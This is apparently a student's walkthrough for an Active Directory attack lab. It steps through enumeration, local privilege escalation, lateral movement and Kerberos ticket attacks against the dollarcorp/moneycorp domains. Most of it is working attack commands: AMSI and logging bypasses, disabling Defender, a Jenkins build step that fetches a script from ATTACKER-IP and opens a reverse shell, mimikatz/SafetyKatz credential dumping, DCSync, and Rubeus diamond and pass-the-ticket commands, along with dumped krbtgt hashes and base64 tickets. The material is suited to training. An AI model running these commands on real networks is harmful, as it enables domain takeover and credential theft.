You would need to turn off Tamper Protection on the student VM after getting user shell or performing local privilege escalation (Check Google on how to do this)
Sometimes you need to click "Enter" key on your keyboard to see result of commands like netcat, rubeus, mimikatz etc
If most attacks most especially in domain persistence don't work, just reboot student VM, you must have created a lot of tickets 😭
Things to do once you have a User First
Start a PowerShell session using Invisi-Shell to avoid enhanced logging
# do this on MS-DOSC:\users\studentx> cd \AD\ToolsC:\users\studentx> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat# You should now have a powershell seesion
Use the AMSI Bypass payload now
Load PowerView in the PowerShell session.
. C:\AD\Tools\PowerView.ps1
Enumeration
[!bug] Learning Objective 1
Enumerate following for the dollarcorp domain :
Users
Computers
Domain Administrators
Enterprise Administrators
Shares
Solution -:
Users
# Powerview (both are same command)# One just shows you logoncount to detect decoy accountsGet-DomainUser-Properties samaccountname,logonCountGet-DomainUser| clear -ExpandProperty samaccountname
Computers
# powerview# shows username, equivalent to the whoami commandGet-DomainComputer| select Name# shows domain network name, equivalent to the hostname commandGet-DomainComputer| select -ExpandProperty dnshostname
Domain Admins
# powerviewGet-DomainGroupMember-Identity "Domain Admins"-Recurse# The most important piece of information from the output is (Note Down) -:# MemeberName# MemeberSID
Enterprise Admin
# powerviewGet-DomainGroupMember-Identity "Enterprise Admins"-Recurse# If you don't get any output after the above command note that# We need to query the root domain as Enterprise Admins group is present only in # the root of a forest.Get-DomainGroupMember-Identity "Enterprise Admins"-Domain moneycorp.local# Also note down MemberName and MemberSID
Shares
# powerviewInvoke-ShareFinder-Verbose# See content of provided shares# dir "\\dcorp-std520.dollarcorp.moneycorp.local\ADMIN$\"dir "\\dnshostname\sharename"
[!bug] Learning Objective 2
Enumerate following for the dollarcorp domain
List all the OUs
List all the computers in the StudentMachines OU.
List all the GPOs
Enumerate GPO applied on the StudentMachines OU
Solution -:
List All Organizational Units
# powerviewGet-DomainOU# Use the -Properties option to filter out just the nameGet-DomainOU-Properties Name
List all the computers in {the/An} {StudentMachines OU/OU}
# powerview# Get OU name firstGet-DomainOU-Properties Name# Then list all computers(Get-DomainOU-Identity <OU_Name>).distinguishedname |%{Get-DomainComputer-SearchBase $_} | select name
List all the GPOs
# powerviewGet-DomainGPO
Enumerate GPO applied on the StudentMachines OU
# powerview# Get OU name firstGet-DomainOU-Properties Name# Grab identity on specific OU nameGet-DomainOU-Identity StudentMachines# copy the "gplink" property where you have "LDAP//:cn={Copy-This}"# Get GPO appliedGet-DomainGPO-Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'
Enumerate all domains in the moneycorp.local forest.
Map the trusts of the dollarcorp.moneycorp.local domain.
Map external trust in the moneycorp.local forest.
Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest ?
Solution -:
Get all domains in the current forest
Get-ForestDomain-verbose # The "Name:" property are the domain names# Or just filter by NameGet-ForestDomain-verbose | select Name
Map the trusts of All Domain
# PowerviewGet-DomainTrust# Map the trust of a domainGet-ForestDomain-verbose | select NameGet-DomainTrust-Domain us.dollarcorp.moneycorp.local# Ouput you should look out for -:# SourceName# TargetName# TrustAttributes# TrustDirection
Trust Direction for the trust between dollarcorp.moneycorp.local and eurocorp.local
# If the "TrustDirection" output of the previous command is either bi-directional trust or one-way trust# Then we can use the below commandGet-ForestDomain-Forest eurocorp.local |%{Get-DomainTrust-Domain $_.Name}
The way i inderstood this is pretty much "ok we're in the domain dollarcorp.moneycorp.local, we target eurocorp.local and ask for the trust direction."
We could've seen it with a simple Get-DomainTrust
Local Privilege Escalation
[!bug] Learning Objective 5
Exploit a service on dcorp-studentx and elevate privileges to local administrator.
Identify a machine in the domain where studentx has local administrative access.
Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server
Solution -:
Get services with unquoted paths and a space in their name {Exploit}
Cd to C:\AD\Tools
Load Invisi-shell
Load AMSI Bypass
Load Powerup.ps1 script
.'C:\Ad\Tools\PowerUp.ps1'
Run the Get-ServiceUnquoted module to check for unquoted path
What is an Unquoted Service Path?
In Windows, services can be started with executable files specified by their paths. Sometimes, these paths contain spaces. If these paths are not enclosed in quotes, it can lead to ambiguity about which executable should be run. For example, consider the service path:
C:\Program Files\Some Service\service.exe
If not enclosed in quotes, the system might misinterpret the path, especially if a malicious executable is placed at a point where the system might look first due to the presence of spaces.
Invoke-AllChecks# Note down the "ServiceName:" with unquoted paths
Exactly the spaces that were mentionnend aboveBut what i did not understand immediatly is that it's not that that we're aiming for, we're going to look at this one ->
Then abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group
Under these conditions we can use the following command in PowerShell to replace the service executable with one of our own that will add a user called dcorp\student613 to the administrators group :
# -Name: Name of service to abuse# -Username: Name of current user, Just run the whoami cmdInvoke-ServiceAbuse-Name 'AbyssWebServer'-UserName 'dcorp\studentx'-Verbose
We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges!
Identify a machine in the domain where present user has local administrative access
Cd to C:\AD\Tools
Load Invisi-shell
Load AMSI Bypass
Load Find-PSRemotingLocalAdminAccess.ps1 script
.C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Fond local administrative access
Find-PSRemotingLocalAdminAccess
We can the connect to the machines found using winrs or Enter-PSSession(Powershell Remoting)
Navigate to the Jenkins instance http://172.16.3.11:8080
Log in with default credentials, in this case build:build, or check google for default Jenkins credentials
Turn off all windows firewall settings
Start up hfs.exe (HTTP File Server) located under C:\AD\Tools\
Navigate to /job/Project0/configure (If you get a 403 keep changing Project0 to Project1, Pro...2, ..........3 till you get a 200)
Scroll down to the option "Build steps" and on the drop down select/add "Execute Windows Batch Command" and enter-:
powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443
# Replace attacker IP with your IP Address, Run "ipconfig" to see it
Start up your listener with netcat.exe
C:\AD\Tools\netcat-win32-1.12\nc64.exe-lvp 443
Hit Apply and then Save and on the left side bar, you should see a Build Now button, Click it.
You should then see your reverse shell as dcorp-ci
Enumeration - Bloodhound
[!bug] Learning Objective 6
Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp domain.
Solution -:
The Reason why this enumeration is coming after Local Privilege Escalation is because we need some administrative rights to run this type of enumeration
BloodHound New Setup
BloodHound uses neo4j graph database, so we need to setup that first.
Go ahead open this location on MS-DOS
cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin
Install and start the neo4j service as follows:
.\neo4j.batinstall-service.\neo4j.bat start
Browse to the neo4j service on localhost:7474/browser/ on your browser
Enter the username: neo4j and password: neo4j.
You also need to enter a new password. Let's use BloodHound as the new password.
We also need to power on bloodhound, change directory to :
cd C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64.\BloodHound.exe
Provide neo4j username and password we crated earlier
You should see a zip file, drag and drop it to bloodhound UI
BloodHound Old Setup
The latest version of BloodHound (4.2.0) does not show Derivate Local Admin edge in GUI. The last version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the same way as above.
Make sure the neo4j UI is still turned off, but you can turn off the newer bloodhound
Change directory to the old bloodhound using MS-DOS and start up bloodhound
cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64.\BloodHound.exe
Now since we have local administrator privileges, go ahead and turn off antivirus (Both Real time protection and Tamper Protection) using GUI
Open another powershell session with local administrative privileges and load Invisi-shell
Shortest path to Domain Admins in the dollarcorp domain - bloodhound
Note -: This can only be done with old bloodhound UI
In Node Info, scroll down to 'LOCAL ADMIN RIGHTS' and expand 'Derivative Local Admin Rights' to find if studentx has derivate local admin rights on any machine!
As we can see below student505 is a member of RDPUSERS group and RDPUSERS is Admin To DCORP-ADMINSRV DC
This means that if we run - winrs -r:dcorp-adminsrv cmd - we can actually be domain admin
Lateral Movement - 1. Using dcorp-ci
[!bug] Learning Objective 7
Identify a machine in the target domain where a Domain Admin session is available.
Compromise the machine and escalate privileges to Domain Admin
Using access to dcorp-ci
Using derivative local admin
Solution -:
Step 1 - Identify a machine in the target domain where a Domain Admin session is available.
Remember we got access to dcorp\ciadmin via the Jenkins instance, we can use this domain user to enumerate more domain admin session is available, Go ahead and get reverse shell with Jenkins again ☹️
First, we must bypass AMSI and enhanced logging.
The below command bypasses Enhanced Script Block Logging
Make sure to setup HFS and host the sbloggingbypass.txt for this
Then run this command to find domain admin session
Note that this might take a lot of time, so wait!! 🤣
Find-DomainUserLocation
Find-DomainUserLocation is designed to find computers where a user, typically a domain admin, has an active session and has local administrative access via PowerShell Remoting. This is useful for determining where administrative privileges can be utilized over the network.
Great! There is a domain admin session on dcorp-mgmt server
Note -: If you don't get result within 4 minutes hit the Enter key on your keyboard twice you should see output, hence, keep waiting till something comes up
Step 2 - Abuse using winrs
Let’s check if we can execute commands on dcorp-mgmt server and if the winrm port is open:
winrs -r:dcorp-mgmt hostname;whoami
Once this is confirmed we can go ahead and run SafetyKatz.exe on dcorp-mgmt to extract credentials from it -:
download Loader.exe on dcorp-ci and copy it from there to dcorp-mgmt
We got credentials of svcadmin - a domain administrator. Note that svcadmin is used as a service account, so you can even get credentials in clear-text from lsasecrets!
Incase you want to use Powershell Remoting instead of winrs, you can check out lab manual
Step 3 - OverPass-the-Hash Rubeus
We will use OverPass-the-Hash, to use svcadmin's credentials
Spawn an elevated shell from the student VM (Run as Administrator)
We have got an interesting policy in \Script that allows everyone to run programs, Signed binaries and scripts located under "C:\ProgramFiles" That means, we can drop scripts in the Program Files directory there and execute them
First, disable Windows Defender on the dcorp-adminsrv server ^2a8dec
Before this exit the winrm session and use PS Remoting
Enter-PSSession dcorp-adminsrv
# Disable windows defender
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Example
Step 1 - Create Invoke-MimiEx.ps1
Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit).
Add Invoke-Mimi -Command '"sekurlsa::ekeys"' to the end of the file.
Example
Open up a new Powershell session on student machine run the following command to transfer the Invoke-Mimi.ps1 to dcorp-adminsrv
From the new process, copy Loader.exe on dcorp-dc and use it to extract credentials
# Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Spawn interactive shell
winrs -r:dcorp-dc cmd
# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x
# Extract Credentials
# make sure to setup HFS first and host SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Run this command on the mimikatz session
lsadump::lsa /patch
# Take Note of the "Domain :" output
# This is the Domain SID that would be use often
Example
Using the secrets of krbtgt account, create a Golden ticket.
To get NTLM hash and AES keys of the krbtgt{or other users} account, we can use the DCSync attack
Run the below command from process running as Domain Admin
Then run the command below to know if you have permissions to viewing scheduling task
exit
schtasks /S dcorp-dc.dollarcorp.moneycorp.local
<<Expected Output>>
[SNIP]
TaskName Next Run Time Status
============================= ====== ===============
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName Next Run Time Status
===================== ============== ===============
AnalyzeSystem N/A Ready
Folder: \Microsoft\Windows\PushToInstall
TaskName Next Run Time Status
============= ====================== ===============
LoginCheck N/A Disabled
Registration N/A Disabled
Folder: \Microsoft\Windows\Ras
TaskName Next Run Time Status
============= ====================== ===============
MobilityManager N/A Ready
[SNIP]
Note That if you get an "Error: Access is denied", you probably did the wrong thing
Step 2 - Gain Reverse Shell
Now host the newly created Invoke-PowerShellTcpEx.ps1 on HFS
Start up your reverse shell on another new MS-DOS session
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
On the same session where we crated our silver ticket run this
Check if the tickets are present, Desired Output -:
klist
Now, try running WMI commands on the domain controller:
# Spawn invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run command on DC
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
Example
Executing the Diamond Ticket attack.
[!bug] Learning Objective 10
Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.
Solution -:
We can simply use the following Rubeus command to execute the attack. Note that the command needs to be run from an elevated shell (Run as administrator):
C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# krbkey is the same as aes256_hmac
# You can use the DCsync attack to get the information
# checkout golden ticket to know more about it
Access the DC using winrs from the new spawned process!
winrs -r:dcorp-dc cmd
Example
Abusing the DSRM credential for persistence.
[!bug] Learning Objective 11
During additional lab time:
Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.
Solution -:
Note that we need Domain Admin privileges to do this, So go ahead and spawn an elevated shell and run this to obtain a new MS-DOS session with domain admin privileges -:
Sweet! Now, below command (or any similar tool) can be used as studentx to get the hashes of krbtgt user or any other user, (Run from an elevated command prompt)
Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.
Solution -:
PowerShell Remoting and WMI Access via Security Descriptor Modification on dcorp-dc
Once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges. Below command (to be run as Domain Administrator) modifies the host security descriptors for WMI on the DC to allow studentx access to WMI
You should now have your hashes written to C:\AD\Tools\hashes.txt, We can now use John the Ripper to brute-force the hashes. Please note that you need to remove ":1433" from the SPN in hashes.txt before running John
We can then run the below command after making above changes -:
Find a server in the dcorp domain where Unconstrained Delegation is enabled.
Compromise the server and escalate to Domain Admin privileges.
Escalate to Enterprise Admins privileges by abusing Printer Bug!
Solution -:
Locate dcorp Domain Server with Unconstrained Delegation Enabled.
Find server with unconstrained delegation
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name
Since the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv. Recall that we extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let’s check if anyone of them have local admin privileges on dcorp-appsrv.
First, we will try with appadmin. Run the below command from an elevated command prompt -:
On the Rubeus listener, we can see the TGT of dcorp-dc$ (Output):
# Important Output
# User :
# Base64EncodedTicket :
[*] Monitoring every 5 seconds for new TGTs
[*] 12/18/2023 9:34:26 PM UTC - Found new TGT:
User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 12/18/2023 5:51:15 AM
EndTime : 12/18/2023 3:51:15 PM
RenewTill : 12/24/2023 8:17:13 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] Ticket cache size: 1
Copy the base64 encoded ticket and Use Rubeus with Base64 Encoded Ticket on Student VM for SafetyKatz DCSync Command (Run the below command from an elevated prompt) -:
# C:\AD\Tools\Rubeus.exe ptt /ticket:<Base64EncodedTicket>
# Example -:
C:\AD\Tools\Rubeus.exe ptt /ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBKQEggSgBicEI7irj3M4XWj9UJcHMQxVP4AUxlDOT7IjYkBSUoR/qySCuEhZS2S4i/z4jo1aedUT61KFX8zk4hEYwWv0lHNuKFWM8UzV2cnzLl/22xgkv23jcu/d8vYUK5eq28ndefHA4vIqlBu4pEffYgX9uVHcWkBdYT6FbXWxC8Zhr7c1LN9QmHXVOHmnpJ0+0TMjm+TlhbGRjPjZpUF42NG+Y3021z94gCL06oboayxzjl1nMNIqhzOKhnDZgZ8tLtSbgjs5d5K4cwbUn6rxbN36Z7OorS9ydZB/K+HAUs6ICVY/C267sBY0+JyoeY54FHDMQ2X3ouD8Llkoeh1tb7l2LaDfhP7E4bpdxat3GDk13IOQDk2ccIEWcDrN5x2sti23q9j7ragMmGpz0OYDerXlhMfwbCeoDfubtOC0L3qxy6GBTcXrpBKnx9MXS2++k/igQV7suV/Upcw1jLbanmvTY4CmjUPX/1InHiEfOwm39+NvBAyc0eSE33zfbvPSCI2eWcFe4CUD8z79u0c+E2ic1lkCwNesEv9dGzFCQmgMiyNj3kXnvbiiEpWT3nDCVi23n7kgDX3LTeSjiW4WOlQFR9Fh02MN2XaYRccGhhzCFfuX3y6pLwMBlsEiVBwQ/s4sbUVxM+ABENjWKrS/LOXVudHioJN1+yOD2UNioXwWB06H2vby6Y0GUqD+5qjrRdcOJgL6AJAe6vNUWIOt2XoHn+PM0wRfR8yYMmcFZem2F5xnnwCia7kcBBNBBReP1herUMKxJ9OHkWkqpR9BrU7bwbot3Mid2AN8Ye4L4G7Bq/PnVL6OcCoDL9cDj1iS505KtIQDqTOuPfbsF0BwBQ6rgmLmL4h5HPt1b5NVXms2Tslr+/pqaeI0yw3byFytbBRaOsfiuwFTZDLOJK9AqwxQs73DR3QskYbmpDC4PoCnxcDuEjds4VxMXSPTAov7S5tH+WJdxihF1z8wwdxX/FONT4YEoWMop/Nw3aKyGPAsbLjPNypyeHmqJymwIRLS5IgEeqPjbk/A6NgVizWSYbZivN/WONi3uaOM4POkzcibz4Q7vrZ1xR3oI3Rcgc5wB91EUUrLVL1tAut+vIVNxFLdT07avtbo1i8zQGdZX7N2RUHXuZcpuN7bjEFeHU8TxySagliLO9Ft4uVB0yKI2JLiHrFj0icNWfw9ICXB1ZLzHKFs+BV0LQSNwAnc7z4D/aV/PrzODgTFYZREm4FZ9xhXWCP1XKRjz8CD2g8d8xCarQ+8RZVCWSMTNXL1mkc6ZchXo1G7d+zvQK0SeLuXgAtCQaO83uJScA+DHMqwU3tepy2gy3luVxm+u6qtzuToekhRJfABRLd0bJhn1Yg91AIxRXd8JNa5LVlWSgATTaFAIP8l67EPsRNkyihhMu5c6ayTJXtB1xa4LjL2CbTvOUWOr6r8YAVzIM+tHYCW9rln2/P4nb97LzHJLQIuSc0gl42aGlGtFicoRaKyrrZ+QnKxXriQKSowtHzsOr0wW2oxAKOBGGX8758l6DCjlomDRD7Yj8Xt7auTq9pg4DDq7ALxuCp6DZeXmd9b2gpC0IcwpLyjggEVMIIBEaADAgEAooIBCASCAQR9ggEAMIH9oIH6MIH3MIH0oCswKaADAgESoSIEIH248sJljTsDzcA4yXD/lnOBTU5WHZCAqFMy5VBSDb7PoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohYwFKADAgEBoQ0wCxsJRENPUlAtREMkowcDBQBgoQAApREYDzIwMjMxMjE4MTM1MTE1WqYRGA8yMDIzMTIxODIzNTExNVqnERgPMjAyMzEyMjUwNDE3MTNaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on dcorp-appsrv:
Note -: Incase you get "access is denied", you are probably running in the wrong shell, so just terminate the Rubeus listener we created then and run in that process
Use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv:
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
# Expected Output -
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.
Now check your Rubeus output and you should see the Base64EncodedTicket
Utilize Rubeus with Base64 Encoded Ticket on Student VM to Execute Elevated SafetyKatz DCSync Command. (Rub below command from elevated shell)
# C:\AD\Tools\Rubeus.exe ptt /ticket:<Base64EncodedTicket>
# Example -:
C:\AD\Tools\Rubeus.exe ptt /ticket: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
Now, we can run the DCSync attack from this process:
[!todo] The TRUSTED_TO_AUTH_FOR_DELEGATION tag must also be set under the "useraccountcontrol :" property
[!info] We already have secrets of websvc from dcorp-adminsrv machine (Check On your bookmarks to see how to do that). We can either use Kekeo or Rubeus to abuse that.
Abuse Constrained Delegation using websvc with Rubeus
Request TGS for 'websvc' as Domain Administrator ('Administrator') and use it to access 'file system' on dcorp-mssql
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
[!important] Incase you wanna use kekeo instead of rubeus, check "Abuse Constrained Delegation using dcorp-adminsrv with Kekeo" in lab manual
[!bug] Learning Objective 17
